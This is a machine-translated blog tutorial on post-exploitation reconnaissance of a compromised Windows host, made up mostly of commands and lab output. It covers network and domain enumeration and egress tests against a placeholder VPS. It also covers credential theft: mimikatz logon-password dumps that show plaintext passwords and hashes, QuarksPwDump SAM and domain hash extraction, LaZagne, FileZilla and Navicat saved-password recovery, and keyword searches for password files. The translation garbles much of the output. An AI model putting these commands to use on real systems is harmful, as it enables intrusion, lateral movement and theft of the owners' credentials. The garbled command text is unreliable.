Shulou(Shulou.com)06/03 Report--

This article mainly introduces "how to use stand-alone information collection". In daily operation, I believe many people have doubts about how to use stand-alone information collection. The editor consulted all kinds of materials and sorted out simple and easy-to-use operation methods. I hope it will be helpful for you to answer the doubts about "how to use stand-alone information collection"! Next, please follow the editor to study!

Thinking

When we get an webshell, or get the initial access through fishing, before we go any further, we need to collect information about the current machine, not just the configuration information of the current machine.

The following are the main questions to think about:

Collect that information?

How to collect this information?

Why collect this information (what is the use and where)?

Problem solving and collecting information list

Native configuration information-network configuration, domain or not, system configuration, outbound, port connection information, services, processes, installed software, host files, environment variables

Account password-local account password, other accounts in the domain, database password, SSH password, remote login password, WIFI password, service configuration file password, backup file password, etc.

Other information-browser history + bookmarks, common locations, etc.

Collect method and function local configuration information

1. Network configuration

[ip, gateway, mask, dns suffix]: it is mainly used to configure some network information to facilitate channel construction and understand the current network segment size.

Ipconfig / all

PS C:\ Users\ Administrator > ipconfig / allWindows IP configuration hostname. . . . . . . . . . . . . WIN-DC main DNS suffix. . . . . . . . . . . Langke.org node type. . . . . . . . . . . . Hybrid IP routing is enabled. . . . . . . . . . : no WINS agent is enabled. . . . . . . . . No DNS suffix search list. . . . . . . . Langke.org Ethernet adapter Ethernet0: connect to a specific DNS suffix. . . . . . . Description. . . . . . . . . . . . . . . Intel (R) 82574L Gigabit Network connection physical address. . . . . . . . . . . . . 00-0C-29-95-22-43 DHCP is enabled. . . . . . . . . . . No automatic configuration is enabled. . . . . . . . . . Is the local link IPv6 address. . . . . . . . Fe80::ed4c:c67:a2b6:7a38 (preferred) IPv4 address. . . . . . . . . . . . 192.168.4.3 (preferred) subnet mask. . . . . . . . . . . . 255.255.255.0 default gateway. . . . . . . . . . . . . : DHCPv6 IAID. . . . . . . . . . . : 301993001 DHCPv6 client DUID. . . . . . . 00-01-00-01-27-5B-EF-6E-00-0C-29-95-22-43 DNS server. . . . . . . . . . . :: 1 NetBIOS on TCPIP. . . . . . . Enabled tunnel adapter isatap. {9A2D7433-2455-4F1A-9314-BBC3C6939A99}: media status. . . . . . . . . . . . The media has been disconnected from the specific DNS suffix. . . . . . . Description. . . . . . . . . . . . . . . Microsoft ISATAP Adapter # 2 physical address. . . . . . . . . . . . . : 00000000000000000000000000-00-E0 DHCP has been enabled. . . . . . . . . . . No automatic configuration is enabled. . . . . . . . . . : yes

[DNS cache]

Ipconfig / displaydns

PS C:\ Users\ Administrator > ipconfig / displaydnsWindows IP configuration _ ldap._tcp.win-dc.langke.org-name does not exist. 542906ca-9ac1-4fa5-b9d4-d1c60954df6c._msdcs.langke.org-record name. . . . . . . : 542906ca-9ac1-4fa5-b9d4-d1c60954df6c._msdcs.langke.org record type. . . . . . . 5 survival time. . . . . . . 144 data length. . . . . . . Part 8. . . . . . . . . Answer CNAME record. . . . . : win-dc.langke.org isatap-- the name does not exist. Wpad-- the name does not exist. _ ldap._tcp.default-first-site-name._sites.win-dc.langke.org-- the name does not exist.

[routing Table]

Route print

Intel C:\ Users\ Administrator > route print==== Interface list 12.00c 29 95 22 43. PS (R) 82574L Gigabit Network connection 1..Software Loopback Interface 1 13. 00 00 00 e0 Microsoft ISATAP Adapter # 2====IPv4 routing Table = active route: network target network mask gateway Interface hops 127.0.0.0 255.0.0.0 on the link 127.0.0.1 306 127.0.0.1 255.255.255.255 on the link 127.0.0.1 306 127.255.255.255.255.255.255 on the link 127.0.0.1 306 192.168.4.0 255.255.255.0 on the link 192.168.4.3 266 192.168.4.3 255.255.255.255 on the link 192.168.4.3 266 192.168.4.255 255.255.255.255 on the link 192.168.4 .3 266 224.0.0.0 240.0.0.0 on link 127.0.0.1 306 224.0.0.0 240.0.0.0 on link 192.168.4.3 266 255.255.255.255.255.255.255.255.255 on link 127.0 .0.1 306 255.255.255.255 255.255.255.255.255 on the link 192.168.4.3 266 permanent routes: no IPv6 routing table = active routes: interface hops network destination gateway 1 306:: 1Universe 128 on the link 12266 fe80::/64 on the link Upper 12266 fe80::ed4c:c67:a2b6:7a38/128 on link 1306 ff00::/8 on link 12266 ff00::/8 on link = = permanent route: none

[ARP table]: get the arp cache record and find more surviving hosts in the private network.

Arp-a

PS C:\ Users\ Administrator > arp-an interface: 192.168.4.3-0xc Internet address physical address type 192.168.4.100 00-0crip29-11-83-25 dynamic 192.168.4.101 00-0c-29-dd-e4-ef dynamic 192.168.4.255 ff-ff-ff-ff-ff -ff static 224.0.0.22 01-00-5e-00-00-16 static 224.0.0.252 01-00-5e-00-00-fc static

two。 Whether it is a domain

[hostname, domain information]: check whether the current host is in the domain, and if so, further collect the current domain information.

Net config workstation

PS C:\ Users\ Administrator > net config workstation computer name\\ WIN-DC computer full name WIN-DC.langke.org user name Administrator workstation is running on NetBT_Tcpip_ {9A2D7433-2455-4F1A-9314-BBC3C6939A99} (000C29952243) software version Windows Server 2012 R2 Standard workstation domain LANGKE workstation domain DNS name langke.org login domain LANGKECOM open timeout (seconds) 0COM send count (bytes) 16COM send timeout (milliseconds) 250command completed successfully.

3. System configuration

[system name, version, number of digits, startup time, whether or not virtual machine and virtual machine type]: understand the basic information of the system, mainly to facilitate the choice of tools, as well as changes in different versions of Windows. For example: after version 2012, the plaintext password cannot be read by default, and the password can only be read by reading the password hash or changing the registry and restarting.

Systeminfo

PS C:\ Users\ Administrator > systeminfo hostname: WIN-DCOS name: Microsoft Windows Server 2012 R2 StandardOS version: 6.3.9600 missing Build 9600OS manufacturer: Microsoft CorporationOS configuration: primary domain controller OS component type: Multiprocessor Free registered owner: Windows user registered organization: product ID: 00252-70000-early 00000-AA581 Initial installation date: 2019-10-21 23:12:01 system startup time: 2020-12-4, 23:36:58 system manufacturer: VMware, Inc. System model: VMware Virtual Platform system type: x64-based PC processor: 2 processors installed. [01]: Intel64 Family 6 Model 142 Stepping 9 GenuineIntel ~ [02]: Intel64 Family 6 Model 142 Stepping 9 GenuineIntel ~ BIOS version: Phoenix Technologies LTD 6.00, 2018/4/13Windows directory: C:\ Windows system directory: C:\ Windows\ system32 boot device:\ Device\ HarddiskVolume1 system locale: zh-cn; Chinese input method locale: zh-cn Chinese time zone: (UTC+08:00) Beijing, Chongqing, Hong Kong Special Administrative region Total physical memory in Urumqi: 2047 MB available physical memory: 846 MB virtual memory: maximum: 6655 MB virtual memory: available: 5255 MB virtual memory: in use: 1400 MB page file location: C:\ pagefile.sys domain: langke.org login server:\\ WIN-DC patch: 110patches installed. [01]: KB2894852 [02]: KB2894856 [03]: KB2919355 Nic: 1 NIC installed. [01]: Intel (R) 82574L Gigabit Network connection name: Ethernet0 enable DHCP: no IP address [01]: 192.168.4.3 [02]: fe80::ed4c:c67:a2b6:7a38Hyper-V requirement: The hypervisor has been detected. The features required by Hyper-V will not be displayed.

4. Whether to get out of the net or not

[TCP, ICMP, UDP, DNS]: learn whether the host can connect to the external network, mainly to cooperate with agent building, data export, etc.

Telnet vps_ip 80

Ping vps_ip

Nc-u vps_ip 53

Nslookup www.baidu.com

5. Port connection information

[open port, connection information]: it is mainly used to collect port opening information to facilitate further penetration. For example, port 3389 can be directly connected to the desktop and port 1433 to further collect information.

Netstat-ano

C:\ Users\ lisi > netstat-ano active connection Agreement Local address external address status PID TCP 0.0.0.0netstat 1350.0.0.0PID TCP 0 LISTENING 728 TCP 0.0.0.0And 445 0.0.0.0netstat 0 LISTENING 4 TCP 0.0.0 . 0:554 0.0.0.0:0 LISTENING 2992 TCP 0.0.0.0:2869 0.0.0.0:0 LISTENING 4 TCP 0.0.0.0:5357 0.0.0.0:0 LISTENING 4 TCP 0.0.0.0:10243 0.0. 0.0:0 LISTENING 4 TCP 0.0.0.0:49152 0.0.0.0:0 LISTENING 400 TCP 0.0.0.0:49153 0.0.0.0:0 LISTENING 780 TCP 0.0.0.0:49154 0.0.0.0:0 LISTENING 948 TCP 0.0.0.0:49159 0.0.0.0:0 LISTENING 504 TCP 0.0.0.0:64849 0.0.0.0:0 LISTENING 512 TCP 192.168.4.101:139 0.0.0.0:0 LISTENING 4 TCP [::]: 135 [::]: 0 LISTENING 728 TCP [::]: 445 [::]: 0 LISTENING 4 TCP [::]: 554 [::]: 0 LISTENING 2992 TCP [::]: 2869 [::]: 0 LISTENING 4 TCP [::]: 5357 [::]: 0 LISTENING 4 TCP [::]: 10243 [::]: 0 LISTENING 4 TCP [::]: 49152 [::]: 0 LISTENING 400 TCP [::]: 49153 [::]: 0 LISTENING 780 TCP [::]: 49154 [::]: 0 LISTENING 948 TCP [::]: 49159 [::]: 0 LISTENING 504 TCP [::]: 64849 [::]: 0 LISTENING 512 UDP 0.0.0.0 UDP 123 *: * 596 UDP 0.0.0.0 UDP 3702 *: * 1456 UDP 0.0.0.0 UDP 3702 *: * 1456 UDP 0.0.0.0 UDP 5004 *: * 2992 UDP 0.0.0.0 UDP 5005 *: * 2992 UDP 0.0.0.0 5 355 *: * 1052. 0UDP 55527 *: * 1456 UDP 127.0.0.1 UDP 1900 *: * 1456 UDP 127.0.0.1 UDP 55531 * : * 1052 UDP 127.0.0.1 UDP 58374 *: * 948 UDP 127.0.1 UDP 192.168.4.101 UDP 137 *: * 4 UDP 192.168.4.101 UDP 1900 *: * 4 UDP 192.168.4.101 UDP 1900 *: * 1456 UDP UDP [::]: 3702 *: * 1456 UDP [::]: 3702 *: * 1456 UDP [::]: 5004 *: * 2992 UDP [::]: 5005 *: * 2992 UDP [:]: 5355 *: * 1052 UDP [::]: 55528 *: * 1456 UDP [: 1]: 1900 *: * 1456 UDP [:: 1]: 60695 *: * 1456 UDP [fe80::d4b6:7c0:d036:7e77]: 1900 *: * 1456 UDP [fe80::d4b6:7c0:d036:7e77]: 60694 *: * 1456

6. Patch

[patch URL, ID, date]: collect the patch information installed on the system, and generally find the corresponding exp when claiming rights.

Wmic qfe get Caption,Description,HotFixID,InstalledOn

C:\ Users\ Administrator > wmic qfe get Caption,Description,HotFixID InstalledOnCaption Description HotFixID InstalledOn http://support.microsoft.com/?kbid=2534111 Hotfix KB2534111 1/27/2020 http://support.microsoft.com/?kbid=2621440 Security Update KB2621440 12/4/2020 http://support.microsoft.com/?kbid=2653956 Security Update KB2653956 12/4/2020 http://support.microsoft.com/?kbid=2943357 Security Update KB2943357 6/24/2020 http://support.microsoft.com/?kbid=2999226 Update KB2999226 1/27/2020 http://support.microsoft.com/?kbid=3097989 Security Update KB3097989 6/24/2020 http://support.microsoft.com/?kbid=4019990 Update KB4019990 12/4/2020 http://support.microsoft.com/?kbid=4040980 Update KB4040980 12/4/2020 http://support.microsoft.com Update KB958488 2/9/2020 http://support.microsoft.com/?kbid=976902 Update KB976902 11/21/2010

7. Service

[service name, pattern, path name]: collect the running services of the current system, mainly to see if there are anti-software, monitoring software, web services, database services.

Wmic service where (state= "running") get caption, name, startmode,pathname

C:\ Users\ Administrator > wmic service where (state= "running") get caption, name, startmode PathnameCaption Name PathName StartModeActive Directory WebServices ADWS C:\ Windows\ ADWS\ Microsoft.ActiveDirectory.WebServices.exe AutoBase Filtering Engine BFE C:\ Windows\ system32\ svchost.exe-k LocalServiceNoNetwork AutoBackground Intelligent Transfer Service BITS C:\ Windows\ System32\ svchost.exe-k netsvcs AutoBackground Tasks Infrastructure Service BrokerInfrastructure C:\ Windows\ System32\ svchost.exe-k DcomLaunch AutoComputer Browser Browser C:\ Windows\ System32\ svchost.exe-k netsvcs AutoCOM+ System Application COMSysApp C:\ Windows\ System32\ dllhost.exe / Processid: {02D4B3F1-FD88-11D1-960D-00805FC79235} ManualCryptographic Services CryptSvc C:\ Windows\ system32\ svchost.exe-k NetworkService AutoDCOM Server Process Launcher DcomLaunch C:\ Windows\ system32\ svchost.exe-k DcomLaunch AutoDFS Namespace Dfs C:\ Windows\ system32\ dfssvc.exe AutoDFS Replication DFSR C:\ Windows\ system32\ DFSRs.exe AutoDHCP Client Dhcp C:\ Windows\ system32\ svchost.exe-k LocalServiceNetworkRestricted AutoDHCP Server DHCPServer C:\ Windows\ system32\ svchost.exe-k DHCPServer AutoDiagnostics Tracking Service DiagTrack C:\ Windows\ System32\ svchost.exe-k utcsv

8. Process

[process name, pid, corresponding service]: collect the processes currently running in the system, and pay attention to whether there are anti-software, monitoring software, remote management tools, etc.

Tasklist / svc

C:\ Users\ Administrator > tasklist / svc image name PID service = lsass.exe 504 Kdc, Netlogon, NTDS, SamSssvchost.exe 636 BrokerInfrastructure, DcomLaunch, LSM, PlugPlay, Power, SystemEventsBrokersvchost.exe 680 RpcEptMapper RpcSsdwm.exe 776 is currently missing vmacthlp.exe 796 VMware Physical Disk Helper Servicesvchost.exe 860 Dhcp, EventLog, lmhosts, Wcmsvcsvchost.exe 892 BITS, Browser, DsmSvc, gpsvc, IKEEXT, iphlpsvc, LanmanServer, ProfSvc, Schedule, SENS, ShellHWDetection, Themes Winmgmtsvchost.exe 940 EventSystem, FontCache, netprofm, nsi, W32Timesvchost.exe 1012 CryptSvc, Dnscache, LanmanWorkstation, NlaSvc, WinRMsvchost.exe 736 BFE, DPS MpsSvcspoolsv.exe 1340 SpoolerMicrosoft.ActiveDirectory 1372 ADWSdfsrs.exe 1412 DFSRsvchost.exe 1452 DHCPServersvchost.exe 1472 DiagTrackdns.exe 1488 DNSismserv.exe 1508 IsmServMsDtsSrvr.exe 1724 MsDtsServer110SMSvcHost.exe 1880 NetTcpPortSharingsqlbrowser.exe 1932 SQLBrowsersqlwriter.exe 2000 SQLWriterServerManager.exe 3536 missing vmtoolsd.exe 1984 missing mmc.exe 1872 missing powershell.exe 1428 missing conhost.exe 1776 missing cmd.exe 1076 missing tasklist.exe 3948

9. Installed softwar

[software, version]: the installed software collected by this command may be incomplete, but you can get a general idea of the installed software information. It can be used to lift power and leave the back door. For example, the previous dog input method depends on and so on.

Wmic product get name,version

C:\ Users\ Administrator > wmic product get name VersionName VersionMicrosoft Application Error Reporting 12.0.6012.5000Microsoft SQL Server System CLR Types 10.51.2500.0SQL Server 2012 Client Tools 11.0.2100.60Microsoft Visual C++ 2008 Redistributable-x86 9.0.30729.4974 9.0.30729.4974SQL Server 2012 Documentation Components 11.0.2100.60Microsoft SQL Server 2012 data layer Application Framework 11. 0.2100.60SQL Server 2012 Master Data Services 11.0.2100.60Microsoft SQL Server 2012 Native Client 11.0.2100.60SQL Server 2012 Database Engine Services 11.0.2100.60Microsoft System CLR Types for SQL Server 2012 11.0.2100.60Microsoft Visual C++ 2010 x64 Redistributable-10.0.40219 10.0.40219SQL Server 2012 Distributed Replay 11.0.2100.60Microsoft Visual C++ 2017 x86 Additional Runtime-14.12.25810 14.12.25810Microsoft Visual C++ 2010 x86 Redistributable-10.0.40219 10.0.40219Microsoft SQL Server 2012 Management object 11.0.2100.60VMware Tools 10.3.2.9925305SQL Server 2012 Integration Services 11.0.2100.60Microsoft VSS Writer for SQL Server 2012 11.0.2100.60Visual Studio 2010 Prerequisites-English 10.0.40219SQL Server 2012 Distributed Replay 11.0.2100.60

10. Hosts

[host file]: the host configuration of the system may collect some hidden assets

C:\ Windows\ System32\ drivers\ etc\ hosts

C:\ Users\ Administrator > type C:\ Windows\ System32\ drivers\ etc\ hosts# Copyright (c) 1993-2009 Microsoft Corp.## This is a sample HOSTS file used by Microsoft TCP/IP for Windows.## This file contains the mappings of IP addresses to host names. Each# entry should be kept on an individual line. The IP address should# be placed in the first column followed by the corresponding host name.# The IP address and the host name should be separated by at least one# space.## Additionally Comments (such as these) may be inserted on individual# lines or following the machine name denoted by a'# 'symbol.## For example:## 102.54.94.97 rhino.acme.com # source server# 38.25.63.10 x.acme.com # x client host# localhost name resolution is handled within DNS itself.# 127.0.0.1 localhost#:: 1 localhost

11. Environment variable

[environment variables]: collect the environment variables of the system, mainly depending on what scripts, programs, etc., are available

Path

C:\ Users\ Administrator > pathPATH=C:\ Windows\ system32;C:\ Windows;C:\ Windows\ System32\ Wbem;C:\ Windows\ System32\ WindowsPowerShell\ v1.0\; C:\ Program Files\ Microsoft SQL Server\ 110\ DTS\ Binn\; C:\ Program Files (x86)\ Microsoft SQL Server\ 110\ Tools\ Binn\ ManagementStudio\; C:\ Program Files (x86)\ Microsoft SQL Server\ 110\ Tools\ Binn\; C:\ Program Files\ Microsoft SQL Server\ Tools\ Binn\ C:\ Program Files (x86)\ Microsoft Visual Studio 10.0\ Common7\ IDE\ PrivateAssemblies\; C:\ Program Files (x86)\ Microsoft SQL Server\ 110\ DTS\ Binn\

twelve。 Firewall configuration rules

[firewall rules]: collect the firewall configuration rules of the system and view the configuration of inbound and outbound networks.

Netsh firewall show config

C:\ Users\ Administrator > netsh firewall show config domain profile configuration:-Operation mode = disable exception mode = enable multicast / broadcast response mode = enable notification mode = disable service profile for domain profile: mode custom name-- -enable allowed program configuration for shared domain profiles for files and printers: mode traffic direction name / program- -Port configuration of domain profile: Port protocol traffic direction name- -1688 TCP enable inbound HEU_KMS_ Service account password

1. Local account password

Local user

Net user

The user account for C:\ Users\ Administrator > net user\\ WIN-DC-Administrator Guest johnkrbtgt lisi command completed successfully.

Online user

Query user

C:\ Users\ Administrator > query user username session name ID status idle time login time > administrator console 1 running without 23:38 on 2020-12-4

Password

Mimikatz.exe "" privilege::debug "log sekurlsa::logonpasswords full"exit

C:\ Users\ lisi\ Desktop > mimikatz.exe "" privilege::debug "log sekurlsa::logonpasswords full"exit. Mimikatz 2.2.0 (x64) # 17763 Mar 25 2019 01:42:05. "A La Vie A L'Amour "- (oe.eo) * * Kitten Edition * # /\ # / * Benjamin DELPY `gentilkiwi` (benjamin@gentilkiwi.com) # # / # # > http://blog.gentilkiwi.com/mimikatz'# v # # 'Vincent LE TOUX (vincent.letoux@gmail.com)' # > http://pingcastle.com / http : / / mysmartlogon.com * * / mimikatz (commandline) # privilege::debugPrivilege '20' OKmimikatz (commandline) # logUsing' mimikatz.log' for logfile: OKmimikatz (commandline) # sekurlsa::logonpasswordsAuthentication Id: 0 1931626 (00000000:001d796a) Session: Interactive from 2User Name: administratorDomain: LANGKELogon Server: WIN-DCLogon Time: 2020-12-5 0:20:14SID: Smuri 1-5-21-2022301354-2747916058-908538118500 msv: [00000003] Primary * Username: Administrator * Domain: LANGKE * LM: 629ea9eacefe7125c187b8085fe1d9df * NTLM: 2723e394bfa34a878b638852b4e37335 * SHA1: 87af129263c193d09d6cade355c50a2d415cabe7 tspkg: * Username: Administrator * Domain: LANGKE * Password: 2wsx@WSX wdigest: * Username: Administrator * Domain: LANGKE * Password: 2wsx@WSX kerberos: * Username: administrator * Domain: LANGKE.ORG * Password: 2wsx@ WSX ssp: credman: Authentication Id: 0 630324 (00000000:00099e34) Session: Interactive from 2User Name: lisiDomain: LANGKELogon Server: WIN-DCLogon Time: 2020-12-4 23:45:44SID: Smuri 1-5-21-2022301354-2747916058-908538118-1116

Hash

QuarksPwDump.exe

/ / Native hashC:\ Users\ Administrator\ Desktop > QuarksPwDump.exe-dhl [+] Setting BACKUP and RESTORE privileges... [OK] [+] Parsing SAM registry hive... [OK] [+] BOOTKEY signing. [OK] BOOTKEY = D61E03DA80125215915636F578505991-BEGIN DUMP- -Guest:501:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0:::Administrator:500:AAD3B435B51404EEAAD3B435B51404EE:BC007082D32777855E253FD4DEFE70EE:::- END DUMP- -- 2 dumped accounts// domain hashC:\ Users\ Administrator\ Desktop > QuarksPwDump.exe-dhdc [+] SYSKEY striping. [OK] SYSKEY = 20242EE7E4AABBF78F48427B90233C50 [+] Setting BACKUP and RESTORE privileges... [OK] [+] Parsing SECURITY registry hive... [OK] [+] LSAKEY (s) signing. [OK] LSAKEY = 708EBC555B43CA7C87FFEB7A46B41797C93D48746571F72838CA61E4D9F72CC1 [+] NLKM marking. [OK] NL$KM = 5AA3BF230BD33D6CAE9F8ED398C50E336DD59357DCEBD64316ADD33B6183BF5F20CB880B7E664D68319673D10315EFF643934B4440DF911AF41239E7DA82A313No cached domain password found!

two。 Other accounts in the domain

Domain user

Net user / domain

C:\ Users\ Administrator\ Desktop > net user / domain\\ WIN-DC user account-Administrator Guest johnkrbtgt The lisi command completed successfully.

Current domain online machine

Net view

C:\ Users\ Administrator\ Desktop > net view server name comment -\ WIN-DC\\ WIN-OA41MD9F1FJ command completed successfully.

Domain management in the current domain

Net group "domain admins" / domain

C:\ Users\ Administrator\ Desktop > net group "domain admins" / domain group name domain administrator member specified by the Domain Admins comment-Administrator command completed successfully.

3. Passwords in the database

[Mysql]

Select name,password from mysql.user

[MSSQL]

SELECT name, password_hash FROM master.sys.sql_logins

4. The browser saves passwords, remote login passwords, credentials saved by Windows system, WIFI passwords, etc.

Lazagne.exe

5. Information saved in FileZilla

[host, port, account number, password]

Type% appdata%\ FileZilla\ filezilla.xml | findstr / C: "Host" / c: "Pass" / c: "Port" / c: "User"

C:\ Users\ Administrator > type% appdata%\ FileZilla\ filezilla.xml | findstr / C: "Host" / c: "Pass" / c: "Port" / c: "User" C:\ Users\ john\ AppData\ Roaming\ FileZilla\ 21 C:\ Users\ john\ 127.0.0.1 21 admin MTIzNDU2Nzg=

6. Information saved in management tools

Navicat

[Mysql, MSSQL, Oracle, SQLite, MariaDB, PostgreSQL]: the host, port and account are all in clear text, the password is custom encryption, and there is a decryption script on the Internet.

MySQL:HKEY_CURRENT_USER\ Software\ PremiumSoft\ Navicat\ Servers\

MariaDB:HKEY_CURRENT_USER\ Software\ PremiumSoft\ NavicatMARIADB\ Servers\

Microsoft SQL:HKEY_CURRENT_USER\ Software\ PremiumSoft\ NavicatMSSQL\ Servers\

Oracle:HKEY_CURRENT_USER\ Software\ PremiumSoft\ NavicatOra\ Servers\

PostgreSQL:HKEY_CURRENT_USER\ Software\ PremiumSoft\ NavicatPG\ Servers\

SQLite:HKEY_CURRENT_USER\ Software\ PremiumSoft\ NavicatSQLite\ Servers\

/ / check the account password C:\ Users\ Administrator > reg query HKCU\ Software\ PremiumSoft / f NavicatHKEY_CURRENT_USER\ Software\ PremiumSoft\ NavicatHKEY_CURRENT_USER\ Software\ NavicatMARIADBHKEY_CURRENT_USER\ PremiumSoft\ NavicatMONGODBHKEY_CURRENT_USER\ Software\ PremiumSoft\ NavicatMSSQLHKEY_CURRENT_USER\ Software\ PremiumSoft\ NavicatOraHKEY_CURRENT_USER\ Software\ PremiumSoft\ NavicatPGHKEY_CURRENT_USER\ Software\ PremiumSoft\ NavicatPremiumHKEY_CURRENT_USER\ Software\ PremiumSoft\ NavicatSQLite search ends: 8 matches found. / / View username C:\ Users\ Administrator > reg query HKCU\ Software\ PremiumSoft / s / f UserName / eHKEY_CURRENT_USER\ Software\ PremiumSoft\ Navicat\ Servers\ 192.168.1.122 UserName REG_SZ rootHKEY_CURRENT_USER\ Software\ PremiumSoft\ Navicat\ Servers\ 192.168.1.123 UserName REG_SZ root// View password hashreg query HKCU\ Software\ PremiumSoft / s / f Pwd / eC:\ Users\ Administrator > reg query HKCU\ Software\ PremiumSoft / s / f Pwd / eHKEY_CURRENT_USER\ Software\ PremiumSoft\ Navicat\ Servers\ 192.168.1.122 Pwd REG_SZHKEY_CURRENT_USER\ Software\ PremiumSoft\ Navicat\ Servers\ 192.168.1.123 Pwd REG_SZ 5658213BB7E6B3

Https://github.com/HyperSine/how-does-navicat-encrypt-password

C:\ Users\ Administrator > navicat-encrypt-password\ python3 > python3 NavicatCryptoHelper.py-d 5658213BB7E6B3 rootstocks

TeamViewer, Xshell, VNC, Winscp, FoXMail, etc

5. The account password saved in the file

[file name]:

Dir / s / b "* password *" * login * "* assets *"* VPN*"* Svn*"* Git*"* handover *"* termination *"* Network *" backend * "" * Topology * "" * mailbox * "" * salary * "" * Administrator * "" * Patrol * "* backup *"

[file contents]: search for lines containing keywords such as "user=", "pass=", "login=", "uid=" and "pwd=" from files with the suffix * .conf * .asp * .php * .aspx * .cgi * .xml * .ini * .inf * .txt * .cgi

Findstr / I / c: "user=" / c: "pass=" / c: "login=" / c: "uid=" / c: "pwd=" / si * .conf * .asp * .php * .jsp * .aspx * .cgi * .xml * .inf * .txt * .cgi

Additional information

1. Browser History + Bookmark

[Chrome bookmark]: json format

C:\ Users\ current user name\ AppData\ Local\ Google\ Chrome\ User Data\ Guest Profile\ Bookmarks

[Chrome History]: SQLite format, no password.

C:\ Users\ current user name\ AppData\ Local\ Google\ Chrome\ User Data\ Default\ History

Firefox, IE, Safar, etc.

Tool: http://www.nirsoft.net

two。 List of commonly used location files

[desktop, download]: there is a good chance that there will be surprises

Dir CVA% homepath%\ Desktop

Dir CVA% homepath%\ Download

At this point, the study on "how to use stand-alone information collection" is over. I hope to be able to solve your doubts. The collocation of theory and practice can better help you learn, go and try it! If you want to continue to learn more related knowledge, please continue to follow the website, the editor will continue to work hard to bring you more practical articles!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.